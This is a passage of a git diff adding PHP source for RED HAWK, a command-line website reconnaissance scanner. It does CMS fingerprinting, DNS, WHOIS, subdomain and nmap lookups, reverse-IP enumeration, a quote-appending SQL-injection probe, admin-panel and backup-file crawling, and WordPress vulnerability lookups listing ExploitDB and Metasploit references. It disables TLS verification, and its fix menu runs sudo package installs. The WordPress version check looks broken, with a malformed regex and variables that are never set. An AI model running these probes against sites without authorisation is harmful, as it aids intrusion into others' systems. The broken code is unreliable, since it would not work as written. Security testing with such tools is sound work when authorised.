. $reallink; + $resulthh = file_get_contents($urlhh); + if (strpos($resulthh, 'cloudflare') !== false) + { + echo "\e[91mDetected\n\e[0m"; + } + else + { + echo "\e[92mNot Detected\n\e[0m"; + } +} + + +function CMSdetect($reallink){ + $cmssc = readcontents($reallink); + if (strpos($cmssc, '/wp-content/') !== false) + { + $tcms = "WordPress"; + + } + else + { + if (strpos($cmssc, 'Joomla') !== false) + { + $tcms = "Joomla"; + } + else + { + $drpurl = $reallink . "/misc/drupal.js"; + $drpsc = readcontents("$drpurl"); + if (strpos($drpsc, 'Drupal') !== false) + { + $tcms = "Drupal"; + } + else + { + if (strpos($cmssc, '/skin/frontend/') !== false) + { + $tcms = "Magento"; + } + else + { + if (strpos($cmssc, 'content="WordPress')!== false) { + $tcms = "WordPress"; + } + else { + + + $tcms = "\e[91mCould Not Detect"; + } + } + } + } + } + return $tcms; +} +function robotsdottxt($reallink){ + $rbturl = $reallink . "/robots.txt"; + $rbthandle = curl_init($rbturl); + curl_setopt($rbthandle, CURLOPT_SSL_VERIFYPEER, false); + curl_setopt($rbthandle, CURLOPT_RETURNTRANSFER, TRUE); + $rbtresponse = curl_exec($rbthandle); + $rbthttpCode = curl_getinfo($rbthandle, CURLINFO_HTTP_CODE); + if ($rbthttpCode == 200) + { + $rbtcontent = readcontents($rbturl); + if ($rbtcontent == "") + { + echo "Found But Empty!"; + } + else + { + echo "\e[92mFound \e[0m\n"; + echo "\e[36m\n-------------[ contents ]---------------- \e[0m\n"; + echo $rbtcontent; + echo "\e[36m\n-----------[end of contents]-------------\e[0m"; + } + } + else + { + echo "\e[91mCould NOT Find robots.txt! \e[0m\n"; + } +} +function gethttpheader($reallink){ + $hdr = get_headers($reallink); + foreach ($hdr as $shdr) { + echo "\n\e[92m\e[1m[i]\e[0m $shdr"; + } + echo "\n"; + +} +function extract_social_links($sourcecode){ + /* This is really a simple code for now i will work around it on the upcoming version. + For now only these social media are supported: + - Facebook + - Twitter + - Instagram + - YouTube + - Google + + - Pinterest + - GitHUB + */ + global $bold, $lblue, $fgreen, $red, $blue, $magenta, $orange, $white, $green, $grey, $cyan; + $fb_link_count = 0; + $twitter_link_count = 0; + $insta_link_count = 0; + $yt_link_count = 0; + $gp_link_count = 0; + $pint_link_count = 0; + $github_link_count = 0; + $total_social_link_count = 0; + + $social_links_array = array ( + 'facebook' => array(), + 'twitter' => array(), + 'instagram' => array(), + 'youtube' => array(), + 'google_p' => array(), + 'pinterest' => array(), + 'github' => array() + ); + + $fb_links = $social_links_array['facebook']; + $twitter_links = $social_links_array['twitter']; + $insta_links = $social_links_array['instagram']; + $youtube_links = $social_links_array['youtube']; + $googlep_links = $social_links_array['google_p']; + $pinterest_links = $social_links_array['pinterest']; + $github_links = $social_links_array['github']; + + $sm_dom = new DOMDocument; + @$sm_dom->loadHTML($sourcecode); + $links = $sm_dom->getElementsByTagName('a'); + foreach ($links as $link) { + $link = $link->getAttribute('href'); + if (strpos ($link, "facebook.com/") !== false){ + $total_social_link_count++; + $fb_link_count++; + array_push($social_links_array['facebook'], $link); + } + elseif (strpos ($link, "twitter.com/") !== false) { + $total_social_link_count++; + $twitter_link_count++; + array_push($social_links_array['twitter'], $link); + } + elseif (strpos ($link, "instagram.com/") !== false) { + $total_social_link_count++; + $insta_link_count++; + array_push($social_links_array['instagram'], $link); + } + elseif (strpos ($link, "youtube.com/") !== false) { + $total_social_link_count++; + $yt_link_count++; + array_push($social_links_array['youtube'], $link); + } + elseif (strpos ($link, "plus.google.com/") !== false) { + $total_social_link_count++; + $gp_link_count++; + array_push($social_links_array['google_p'], $link); + } + elseif (strpos ($link, "github.com/") !== false) { + $total_social_link_count++; + $github_link_count++; + array_push($social_links_array['github'], $link); + } + elseif (strpos ($link, "pinterest.com/") !== false) { + $total_social_link_count++; + $pint_link_count++; + array_push($social_links_array['pinterest'], $link); + } + else { + // I know this has nothing to do with the code but again i love comments ;__; it's feels good to waste time :p + } + } + if ($total_social_link_count == 0){ + echo $bold . $red . "[!] No Social Link Found In Source Code. \n\e[0m"; + } + elseif ($total_social_link_count == "1") { + // As much as i hate to admit grammer is important :p + echo $bold . $lblue . "[i] " . $fgreen . $total_social_link_count . $lblue . " Social Link Was Gathered From Source Code \n\n"; + foreach ($social_links_array['facebook'] as $link) { + echo $bold . $blue . "[ facebook ] " . $white . $link . "\n"; + } + foreach ($social_links_array['twitter'] as $link) { + echo $bold . $cyan . "[ twitter ] " . $white . $link . "\n"; + } + foreach ($social_links_array['instagram'] as $link) { + echo $bold . $magenta . "[ instagram ] " . $white . $link . "\n"; + } + foreach ($social_links_array['youtube'] as $link) { + echo $bold . $red . "[ youtube ] " . $white . $link . "\n"; + } + foreach ($social_links_array['google_p'] as $link) { + echo $bold . $orange . "[ google+ ] " . $white . $link . "\n"; + } + foreach ($social_links_array['pinterest'] as $link) { + echo $bold . $red . "[ pinterest ] " . $white . $link . "\n"; + } + foreach ($social_links_array['github'] as $link) { + echo $bold . $grey . "[ github ] " . $white . $link . "\n"; + } + echo "\n"; + } else { + echo $bold . $lblue . "[i] " . $fgreen . $total_social_link_count . $lblue . " Social Links Were Gathered From Source Code \n\n"; + foreach ($social_links_array['facebook'] as $link) { + echo $bold . $blue . "[ facebook ] " . $white . $link . "\n"; + } + foreach ($social_links_array['twitter'] as $link) { + echo $bold . $cyan . "[ twitter ] " . $white . $link . "\n"; + } + foreach ($social_links_array['instagram'] as $link) { + echo $bold . $magenta . "[ instagram ] " . $white . $link . "\n"; + } + foreach ($social_links_array['youtube'] as $link) { + echo $bold . $red . "[ youtube ] " . $white . $link . "\n"; + } + foreach ($social_links_array['google_p'] as $link) { + echo $bold . $orange . "[ google+ ] " . $white . $link . "\n"; + } + foreach ($social_links_array['pinterest'] as $link) { + echo $bold . $red . "[ pinterest ] " . $white . $link . "\n"; + } + foreach ($social_links_array['github'] as $link) { + echo $bold . $grey . "[ github ] " . $white . $link . "\n"; + } + echo "\n"; + } +} +function extractLINKS($reallink){ + global $bold, $lblue, $fgreen; + $arrContextOptions=array( + "ssl"=>array( + "verify_peer"=>false, + "verify_peer_name"=>false, + ), + ); + $ip = str_replace("https://","",$reallink); + $lwwww = str_replace("www.","",$ip); + $elsc = file_get_contents($reallink, false, stream_context_create($arrContextOptions)); + $eldom = new DOMDocument; + @$eldom->loadHTML($elsc); + $elinks = $eldom->getElementsByTagName('a'); + $elinks_count = 0; + foreach ($elinks as $ec) { + $elinks_count++; + } + echo $bold . $lblue . "[i] Number Of Links Found In Source Code : " . $fgreen . $elinks_count . "\n"; + userinput("Display Links ? (Y/N) "); + $bv_show_links = trim(fgets(STDIN, 1024)); + if ($bv_show_links == "y" or $bv_show_links =="Y"){ + foreach ($elinks as $elink) { + $elhref = $elink->getAttribute('href'); + if (strpos($elhref, $lwwww) !== false ) { + echo "\n\e[92m\e[1m*\e[0m\e[1m $elhref"; + + } + else { + echo "\n\e[38;5;208m\e[1m*\e[0m\e[1m $elhref"; + } + } + echo "\n"; + } + +else { + // not showing links. +} +} +function readcontents($urltoread){ + $arrContextOptions=array( + "ssl"=>array( + "verify_peer"=>false, + "verify_peer_name"=>false, + ), + ); + $filecntns = file_get_contents($urltoread, false, stream_context_create($arrContextOptions)); + return $filecntns; +} + +function MXlookup ($site){ + $Mxlkp = dns_get_record($site, DNS_MX); + $mxrcrd = $Mxlkp[0]['target']; + $mxip = gethostbyname($mxrcrd); + $mx = gethostbyaddr($mxip); + $mxresult = "\e[1m\e[36mIP :\e[32m " . $mxip ."\n\e[36mHOSTNAME:\e[32m " . $mx ; + return $mxresult; +} + +function bv_get_alexa_rank($url){ + $xml = simplexml_load_file("http://data.alexa.com/data?cli=10&url=".$url); + if(isset($xml->SD)): + return $xml->SD->POPULARITY->attributes()->TEXT; + endif; +} +function bv_moz_info($url){ + global $bold, $red, $fgreen, $lblue, $blue; + require ("config.php"); + if (strpos($accessID, " ") !== false OR strpos($secretKey, " ") !== false){ + echo $bold . $red . "\n[!] Some Results Will Be Omited (Please Put Valid MOZ API Keys in config.php file)\n\n"; + } + else { + $expires = time() + 300; + $SignInStr = $accessID. "\n" .$expires; + $binarySignature = hash_hmac('sha1', $SignInStr, $secretKey, true); + $SafeSignature = urlencode(base64_encode($binarySignature)); + $objURL = $url; + $flags = "103079231492"; + $reqUrl = "http://lsapi.seomoz.com/linkscape/url-metrics/".urlencode($objURL)."?Cols=".$flags."&AccessID=".$accessID."&Expires=".$expires."&Signature=".$SafeSignature; + $opts = array( + CURLOPT_RETURNTRANSFER => true + ); + $curlhandle = curl_init($reqUrl); + curl_setopt_array($curlhandle, $opts); + $content = curl_exec($curlhandle); + curl_close($curlhandle); + $resObj = json_decode($content); + echo $bold . $lblue . "[i] Moz Rank : " . $fgreen . $resObj->{'umrp'} . "\n"; + echo $bold . $lblue . "[i] Domain Authority : " . $fgreen . $resObj->{'pda'} . "\n"; + echo $bold . $lblue . "[i] Page Authority : " . $fgreen . $resObj->{'upa'} . "\n"; + } +} +?> diff --git a/redhawk/rhawk.php b/redhawk/rhawk.php new file mode 100644 index 0000000..007b860 --- /dev/null +++ b/redhawk/rhawk.php @@ -0,0 +1,1201 @@ + 0) + { + userinput("Do You Want RED HAWK To Detect CMS Of The Sites? [Y/N]"); + $detectcmsui = trim(fgets(STDIN, 1024)); + if ($detectcmsui == "y" | $detectcmsui == "Y") + { + $detectcms = "yes"; + } + else + { + $detectcms = "no"; + } + } + foreach ($array as $izox) + { + $izox = str_replace(",", "", $izox); + $cmsurl = "http://" . $izox; + echo "\n" . $bold . $lblue . "HOSTNAME : " . $fgreen . $izox . $cln; + echo "\n" . $bold . $lblue . "IP : " . $fgreen . gethostbyname($izox) . $cln . "\n"; + if ($detectcms == "yes") + { + echo $lblue . $bold . "CMS : " . $green . CMSdetect($cmsurl) . $cln . "\n\n"; + } + } + echo "\n\n"; + echo $bold . $yellow . "[*] Scanning Complete. Press Enter To Continue OR CTRL + C To Stop\n\n"; + trim(fgets(STDIN, 1024)); + goto scanlist; + } + elseif ($scan == "9") + { + $reallink = $ipsl . $ip; + $srccd = file_get_contents($reallink); + $lwwww = str_replace("www.", "", $ip); + echo "\n$cln" . $lblue . $bold . "[+] Scanning Begins ... \n"; + echo $blue . $bold . "[i] Scanning Site:\e[92m $ipsl" . "$ip \n"; + echo $bold . $yellow . "[S] Scan Type : SQL Vulnerability Scanner" . $cln; + echo "\n\n"; + $lulzurl = $reallink; + $html = file_get_contents($lulzurl); + $dom = new DOMDocument; + @$dom->loadHTML($html); + $links = $dom->getElementsByTagName('a'); + $vlnk = 0; + foreach ($links as $link) + { + $lol = $link->getAttribute('href'); + if (strpos($lol, '?') !== false) + { + echo $lblue . $bold . "\n[ LINK ] " . $fgreen . $lol . "\n" . $cln; + echo $blue . $bold . "[ SQLi ] "; + $sqllist = file_get_contents('sqlerrors.ini'); + $sqlist = explode(',', $sqllist); + if (strpos($lol, '://') !== false) + { + $sqlurl = $lol . "'"; + } + else + { + $sqlurl = $ipsl . $ip . "/" . $lol . "'"; + } + $sqlsc = file_get_contents($sqlurl); + $sqlvn = $bold . $red . "Not Vulnerable"; + foreach ($sqlist as $sqli) + { + if (strpos($sqlsc, $sqli) !== false) + $sqlvn = $green . $bold . "Vulnerable!"; + } + echo $sqlvn; + echo "\n$cln"; + echo "\n"; + $vlnk++; + } + } + echo "\n" . $blue . $bold . "[+] URL(s) With Parameter(s): " . $green . $vlnk; + echo "\n\n"; + echo $bold . $yellow . "[*] Scanning Complete. Press Enter To Continue OR CTRL + C To Stop\n\n"; + trim(fgets(STDIN, 1024)); + goto scanlist; + } + elseif ($scan == "10") + { + $reallink = $ipsl . $ip; + $srccd = readcontents($reallink); + $lwwww = str_replace("www.", "", $ip); + echo "\n$cln\t" . $lblue . $bold . "[+] BLOGGERS ViEW [+] \n\n"; + echo $blue . $bold . "[i] Scanning Site:\e[92m $ipsl" . "$ip \n"; + echo "\n\n"; + $test_url = $reallink; + $handle = curl_init($test_url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $tu_response = curl_exec($handle); + $test_url_http_code = curl_getinfo($handle, CURLINFO_HTTP_CODE); + echo $lblue . $bold . "[i] HTTP Response Code : " . $fgreen . $test_url_http_code . "\n"; + echo $lblue . "[i] Site Title: " . $fgreen . getTitle($reallink) . "\n"; + echo $lblue . "[i] CMS (Content Management System) : " . $fgreen . CMSdetect($reallink) . "\n"; + echo $lblue . $bold . "[i] Alexa Global Rank : " . $fgreen . bv_get_alexa_rank($lwwww) . "\n"; + bv_moz_info($lwwww); + extract_social_links($srccd); + extractLINKS($reallink); + echo "\n\n"; + echo $bold . $yellow . "[*] Scanning Complete. Press Enter To Continue OR CTRL + C To Stop\n\n"; + trim(fgets(STDIN, 1024)); + goto scanlist; + } + elseif ($scan == "11") + { + userinput("Enter The Directory in which WordPress is installed (for example /blog) If it is running on " . $ipsl . $ip . " simply press ENTER"); + $wp_inst_loc = trim(fgets(STDIN, 1024)); + if ($wp_inst_loc == "") + { + $reallink = $ipsl . $ip; + } + else + { + $reallink = $ipsl . $ip . $wp_inst_loc; + } + echo "\n$cln" . $lblue . $bold . "[+] Scanning Begins ... \n"; + echo $blue . $bold . "[i] Scanning Site:\e[92m $reallink \n"; + echo $bold . $yellow . "[S] Scan Type : WordPress Scanner." . $cln; + echo "\n\n"; + echo $bold . $blue . "[+] Checking if the site is built on WordPress: "; + $srccd = readcontents($reallink); + if (strpos($srccd, "wp-content") !== false) + { + echo $fgreen . "Determined !" . $cln . "\n"; + echo $bold . $yellow . "\n\t Basic Checks \n\t==============\n\n"; + $wp_rm_src = readcontents($reallink . "/readme.html"); + if (strpos($wp_rm_src, "Welcome. WordPress is a very special project to me.") !== false) + { + echo $fgreen . "[i] Readme File Found, Link: " . $reallink . "/readme.html\n"; + } + else + { + echo $red . "[!] Readme File Not Found!\n"; + } + $wp_lic_src = readcontents($reallink . "/license.txt"); + if (strpos($wp_lic_src, "WordPress - Web publishing software") !== false) + { + echo $fgreen . "[i] License File Found, Link: " . $reallink . "/license.txt\n"; + } + else + { + echo $red . "[!] License File Not Found!\n"; + } + $wp_updir_src = readcontents($reallink . "/wp-content/uploads/"); + if (strpos($wp_updir_src, "Index of /wp-content/uploads") !== false) + { + echo $fgreen . $reallink . "/wp-content/uploads Is Browseable\n"; + } + $wp_xmlrpc_src = readcontents($reallink . "/xmlrpc.php"); + if (strpos($wp_xmlrpc_src, "XML-RPC server accepts POST requests only.") !== false) + { + echo $fgreen . "[i] XML-RPC interface Available Under " . $reallink . "/xmlrpc.php\n"; + } + else + { + echo $red . "[!] Could Not Find XML-RPC interface\n"; + } + echo $bold . $blue . "[+] Finding WordPress Version: "; + $metaver = preg_match('/http://wordpress.org/\?v=(.*?)#ims', $feedsrc, $matches) ? $matches[1] : null; + if ($feedver != "") + { + echo $fgreen . "Found [Using Method 2 of 3]" . "\n"; + echo $blue . "[i] WordPress Version: " . $fgreen . $feedver . $cln; + $wp_version = str_replace(".", "", $feedver); + $wp_c_version = $feedver; + } + else + { + $lopmlsrc = readcontents($reallink . "/wp-links-opml.php"); + $lopmlver = preg_match('#generator="wordpress/(.*?)"#ims', $feedsrc, $matches) ? $matches[1] : null; + if ($lopmlver != "") + { + echo $fgreen . "Found [Using Method 3 of 3]" . "\n"; + echo $blue . "[i] WordPress Version: " . $fgreen . $lopmlver . $cln; + $wp_version = str_replace(".", "", $lopmlver); + $wp_c_version = $lopmlver; + } + } + } + if ($wp_version != "") + { + echo "\n" . $bold . $blue . "[+] Collecting Version Details From WPVulnDB: "; + $vuln_json = readcontents("https://wpvulndb.com/api/v2/wordpresses/" . $wp_version); + if (strpos($vuln_json, "The page you were looking for doesn't exist (404)") !== false) + { + echo $red . "[!] Seems like the version detection messed up preety bad! Please report here: https://github.com/Tuhinshubhra/RED_HAWK/issues/new\n"; + } + else + { + $vuln_array = json_decode($vuln_json, TRUE); + echo $fgreen . "Done\n\n"; + echo $yellow . "\t WordPress Version Informations\n\t================================\n\n"; + echo $lblue . "[i] WordPress Version : " . $fgreen . $wp_c_version . "\n"; + echo $lblue . "[i] Release Date : " . $fgreen . $vuln_array[$wp_c_version]["release_date"] . "\n"; + echo $lblue . "[i] Changelog URL : " . $fgreen . $vuln_array[$wp_c_version]["changelog_url"] . "\n"; + echo $lblue . "[i] Vulnerability Count : " . $fgreen . count($vuln_array[$wp_c_version]["vulnerabilities"]) . "\n"; + if (count($vuln_array[$wp_c_version]["vulnerabilities"]) != "0") + { + echo $yellow . "\n\t Version Vulnerabilities \n\t=========================\n\n"; + $ver_vuln_array = $vuln_array[$wp_c_version]['vulnerabilities']; + foreach ($ver_vuln_array as $vuln_s) + { + echo $lblue . "[i] Vulnerability Title : " . $fgreen . $vuln_s["title"] . "\n"; + echo $lblue . "[i] Vulnerability Type : " . $fgreen . $vuln_s["vuln_type"] . "\n"; + echo $lblue . "[i] Fixed In Version : " . $fgreen . $vuln_s["fixed_in"] . "\n"; + echo $lblue . "[i] Vulnerability Link : " . $fgreen . "http://wpvulndb.com/vulnerabilities/" . $vuln_s['id'] . "\n"; + foreach ($vuln_s['references']["cve"] as $wp_cve) + { + echo $lblue . "[i] Vuln CVE : " . $fgreen . "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-" . $wp_cve . "\n"; + } + foreach ($vuln_s['references']['exploitdb'] as $wp_edb) + { + echo $lblue . "[i] ExploitDB Link : " . $fgreen . "http://www.exploit-db.com/exploits/" . $wp_edb . "\n"; + } + foreach ($vuln_s['references']['metasploit'] as $wp_metas) + { + echo $lblue . "[i] Metasploit Module : " . $fgreen . "http://www.metasploit.com/modules/" . $wp_metas . "\n"; + } + foreach ($vuln_s['references']['osvdb'] as $wp_osvdb) + { + echo $lblue . "[i] OSVDB Link : " . $fgreen . "http://osvdb.org/" . $wp_osvdb . "\n"; + } + foreach ($vuln_s['references']['secunia'] as $wp_secu) + { + echo $lblue . "[i] Secunia Link : " . $fgreen . "http://secunia.com/advisories/" . $wp_secu . "\n"; + } + foreach ($vuln_s['references']["url"] as $vuln_ref) + { + echo $lblue . "[i] Vuln Reference : " . $fgreen . $vuln_ref . "\n"; + } + echo "\n\n"; + } + } + } + $reallink = $ipsl . $ip; + echo "\n\n"; + echo $bold . $yellow . "[*] Scanning Complete. Press Enter To Continue OR CTRL + C To Stop\n\n"; + trim(fgets(STDIN, 1024)); + goto scanlist; + } + else + { + $reallink = $ipsl . $ip; + echo $red . "Failed \n\n[!] RED HAWK could not determine the WordPress version of the target!"; + echo "\n\n"; + echo $bold . $yellow . "[*] Scanning Complete. Press Enter To Continue OR CTRL + C To Stop\n\n"; + trim(fgets(STDIN, 1024)); + goto scanlist; + } + } + else + { + $reallink = $ipsl . $ip; + echo $red . "Failed \n\n[!] Wordpress installation could not be determined, Exiting Scan!"; + echo "\n\n"; + echo $bold . $yellow . "[*] Scanning Complete. Press Enter To Continue OR CTRL + C To Stop\n\n"; + trim(fgets(STDIN, 1024)); + goto scanlist; + } + } + elseif ($scan == "12") + { + echo "\n$cln" . $lblue . $bold . "[+] Scanning Begins ... \n"; + echo $blue . $bold . "[i] Scanning Site:\e[92m $ipsl" . "$ip \n"; + echo $bold . $yellow . "[S] Scan Type : Crawling" . $cln; + echo "\n\n"; + echo $bold . $blue . "\n[i] Loading Crawler File ....\n" . $cln; + if (file_exists("crawl/admin.ini")) + { + echo $bold . $fgreen . "\n[^_^] Admin Crawler File Found! Scanning For Admin Pannel [-]\n" . $cln; + $crawllnk = file_get_contents("crawl/admin.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo $bold . $lblue . "\n\n[U] $url : " . $cln; + echo $bold . $fgreen . "Found!" . $cln; + } + elseif ($httpCode == 404) + { + } + else + { + echo $bold . $lblue . "\n\n[U] $url : " . $cln; + echo $bold . $yellow . "HTTP Response: " . $httpCode . $cln; + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + if (file_exists("crawl/backup.ini")) + { + echo "\n[-] Backup Crawler File Found! Scanning For Site Backups [-]\n"; + $crawllnk = file_get_contents("crawl/backup.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo $bold . $lblue . "\n\n[U] $url : " . $cln; + echo $bold . $fgreen . "Found!" . $cln; + } + elseif ($httpCode == 404) + { + } + else + { + echo $bold . $lblue . "\n\n[U] $url : " . $cln; + echo $bold . $yellow . "HTTP Response: " . $httpCode . $cln; + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + if (file_exists("crawl/others.ini")) + { + echo "\n[-] General Crawler File Found! Crawling The Site [-]\n"; + $crawllnk = file_get_contents("crawl/others.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo $bold . $lblue . "\n\n[U] $url : " . $cln; + echo $bold . $fgreen . "Found!" . $cln; + } + elseif ($httpCode == 404) + { + } + else + { + echo $bold . $lblue . "\n\n[U] $url : " . $cln; + echo $bold . $yellow . "HTTP Response: " . $httpCode . $cln; + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + } + elseif ($scan == "13") + { + $reallink = $ipsl . $ip; + $lwwww = str_replace("www.", "", $ip); + echo "\n$cln" . $lblue . $bold . "[+] Scanning Begins ... \n"; + echo $blue . $bold . "[i] Scanning Site:\e[92m $ipsl" . "$ip \n"; + echo $bold . $yellow . "[S] Scan Type : MX Lookup" . $cln; + echo "\n\n"; + echo MXlookup($lwwww); + echo "\n\n"; + echo $bold . $yellow . "[*] Scanning Complete. Press Enter To Continue OR CTRL + C To Stop\n\n"; + trim(fgets(STDIN, 1024)); + goto scanlist; + } + elseif ($scan == 'U' || $scan == 'u') + { + echo "\n\n" . $bold . $yellow . "-[ RED HAWK Update Corner]-\n\n" . $cln; + echo $bold . "[i] Fetching Stuffs .... \n" . $cln; + $latestversion = readcontents("https://raw.githubusercontent.com/Tuhinshubhra/RED_HAWK/master/version.txt"); + echo $bold . $blue . "[C] Current Version: " . $rhversion . $cln; + echo "\n" . $bold . $lblue . "[L] Latest Version: " . $latestversion . $cln; + if ($latestversion > $rhversion) + { + echo $bold . $fgreen . "\n\n[U] Update Available, Please Update Your Version Of RED HAWK \n" . $cln; + echo $bold . $white . " Link: https://github.com/Tuhinshubhra/RED_HAWK\n\n" . $cln; + } + + elseif ($rhversion == $latestversion) + { + echo $bold . $fgreen . "\n[i] You are already running the latest version of RED HAWK. \n\n" . $cln; + } + else + { + echo $bold . $red . "\n[U] Seems You Tampered With The Script !! Please Take The Trouble OF Checking For Update Manually!!! \n\n"; + } + } + elseif ($scan == "F" || $scan == "f"){ + echo "\n\e[91m\e[1m[+] RED HAWK FiX MENU [+]\n\n$cln"; + echo $bold . $blue . "[+] Checking If cURL module is installed ...\n"; + if (!extension_loaded('curl')) + { + echo $bold . $red . "[!] cURL Module Not Installed ! \n"; + echo $yellow . "[*] Installing cURL. (Operation requeires sudo permission so you might be asked for password) \n" . $cln; + system("sudo apt-get -qq --assume-yes install php-curl"); + echo $bold . $fgreen . "[i] cURL Installed. \n"; + } + else + { + echo $bold . $fgreen . "[i] cURL is already installed, Skipping To Next \n"; + } + echo $bold . $blue . "[+] Checking If php-XML module is installed ...\n"; + if (!extension_loaded('dom')) + { + echo $bold . $red . "[!] php-XML Module Not Installed ! \n"; + echo $yellow . "[*] Installing php-XML. (Operation requeires sudo permission so you might be asked for password) \n" . $cln; + system("sudo apt-get -qq --assume-yes install php-xml"); + echo $bold . $fgreen . "[i] DOM Installed. \n"; + } + else + { + echo $bold . $fgreen . "[i] php-XML is already installed, You Are All SET ;) \n"; + } + echo $bold . $fgreen . "[i] Job finished successfully! Please Restart RED HAWK \n"; + exit; + } + elseif ($scan == "A" || $scan == "a") + { + + echo "\n$cln" . "$lblue" . "[+] Scanning Begins ... \n"; + echo "$blue" . "[i] Scanning Site:\e[92m $ipsl" . "$ip \n"; + echo "\n\n"; + + echo "\n$bold" . "$lblue" . "B A S I C I N F O \n"; + echo "====================\n"; + echo "\n\e[0m"; + + $reallink = $ipsl . $ip; + $srccd = file_get_contents($reallink); + $lwwww = str_replace("www.", "", $ip); + + echo "\n$blue" . "[+] Site Title: "; + echo "\e[92m"; + echo getTitle($reallink); + echo "\e[0m"; + + + $wip = gethostbyname($ip); + echo "\n$blue" . "[+] IP address: "; + echo "\e[92m"; + echo $wip . "\n\e[0m"; + + echo "$blue" . "[+] Web Server: "; + WEBserver($reallink); + echo "\n"; + + echo "$blue" . "[+] CMS: \e[92m" . CMSdetect($reallink) . " \e[0m"; + + echo "\n$blue" . "[+] Cloudflare: "; + cloudflaredetect($reallink); + + echo "$blue" . "[+] Robots File:$cln "; + robotsdottxt($reallink); + echo "\n\n$cln"; + echo "\n\n$bold" . $lblue . "W H O I S L O O K U P\n"; + echo "========================"; + echo "\n\n$cln"; + $urlwhois = "http://api.hackertarget.com/whois/?q=" . $lwwww; + $resultwhois = file_get_contents($urlwhois); + echo "\t"; + echo $resultwhois; + echo "\n\n$cln"; + + echo "\n\n$bold" . $lblue . "G E O I P L O O K U P\n"; + echo "========================="; + echo "\n\n$cln"; + $urlgip = "http://api.hackertarget.com/geoip/?q=" . $lwwww; + $resultgip = readcontents($urlgip); + $geoips = explode("\n", $resultgip); + foreach ($geoips as $geoip) + { + echo $bold . $green . "[i]$cln $geoip \n"; + } + echo "\n\n$cln"; + + echo "\n\n$bold" . $lblue . "H T T P H E A D E R S\n"; + echo "======================="; + echo "\n\n$cln"; + gethttpheader($reallink); + echo "\n\n"; + + echo "\n\n$bold" . $lblue . "D N S L O O K U P\n"; + echo "==================="; + echo "\n\n$cln"; + $urldlup = "http://api.hackertarget.com/dnslookup/?q=" . $lwwww; + $resultdlup = file_get_contents($urldlup); + echo $resultdlup; + echo "\n\n"; + + echo "\n\n$bold" . $lblue . "S U B N E T C A L C U L A T I O N\n"; + echo "===================================="; + echo "\n\n$cln"; + $urlscal = "http://api.hackertarget.com/subnetcalc/?q=" . $lwwww; + $resultscal = file_get_contents($urlscal); + echo $resultscal; + echo "\n\n"; + + echo "\n\n$bold" . $lblue . "N M A P P O R T S C A N\n"; + echo "============================"; + echo "\n\n$cln"; + $urlnmap = "http://api.hackertarget.com/nmap/?q=" . $lwwww; + $resultnmap = file_get_contents($urlnmap); + echo $resultnmap; + echo "\n"; + + echo "\n\n$bold" . $lblue . "S U B - D O M A I N F I N D E R\n"; + echo "=================================="; + echo "\n\n"; + $urlsd = "http://api.hackertarget.com/hostsearch/?q=" . $lwwww; + $resultsd = file_get_contents($urlsd); + $subdomains = trim($resultsd, "\n"); + $subdomains = explode("\n", $subdomains); + unset($subdomains['0']); + $sdcount = count($subdomains); + echo "\n$blue" . "[i] Total Subdomains Found :$cln " . $green . $sdcount . "\n\n$cln"; + foreach ($subdomains as $subdomain) + { + echo "[+] Subdomain:$cln $fgreen" . (str_replace(",", "\n\e[0m[-] IP:$cln $fgreen", $subdomain)); + echo "\n\n$cln"; + } + echo "\n\n"; + + echo "\n\n$bold" . $lblue . "R E V E R S E I P L O O K U P\n"; + echo "=================================="; + echo "\n\n"; + $sth = 'http://domains.yougetsignal.com/domains.php'; + $ch = curl_init($sth); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$ip&ket="); + curl_setopt($ch, CURLOPT_HEADER, 0); + curl_setopt($ch, CURLOPT_POST, 1); + $resp = curl_exec($ch); + $resp = str_replace("[", "", str_replace("]", "", str_replace("\"\"", "", str_replace(", ,", ",", str_replace("{", "", str_replace("{", "", str_replace("}", "", str_replace(", ", ",", str_replace(", ", ",", str_replace("'", "", str_replace("'", "", str_replace(":", ",", str_replace('"', '', $resp))))))))))))); + $array = explode(",,", $resp); + unset($array[0]); + echo "\n$blue" . "[i] Total Sites Found On This Server :$cln " . $green . count($array) . "\n\n$cln"; + foreach ($array as $izox) + { + echo "\n$blue" . "[#]$cln " . $fgreen . $izox . $cln; + echo "\n$blue" . "[-] CMS:$cln $green"; + $cmsurl = "http://" . $izox; + $cmssc = file_get_contents($cmsurl); + if (strpos($cmssc, '/wp-content/') !== false) + { + $tcms = "WordPress"; + } + else + { + if (strpos($cmssc, 'Joomla') !== false) + { + $tcms = "Joomla"; + } + else + { + $drpurl = "http://" . $izox . "/misc/drupal.js"; + $drpsc = file_get_contents($drpurl); + if (strpos($drpsc, 'Drupal') !== false) + { + $tcms = "Drupal"; + } + else + { + if (strpos($cmssc, '/skin/frontend/') !== false) + { + $tcms = "Magento"; + } + else + { + $tcms = $red . "Could Not Detect$cln "; + } + } + } + } + echo $tcms . "\n"; + } + + echo "\n\n"; + echo "\n\n$bold" . $lblue 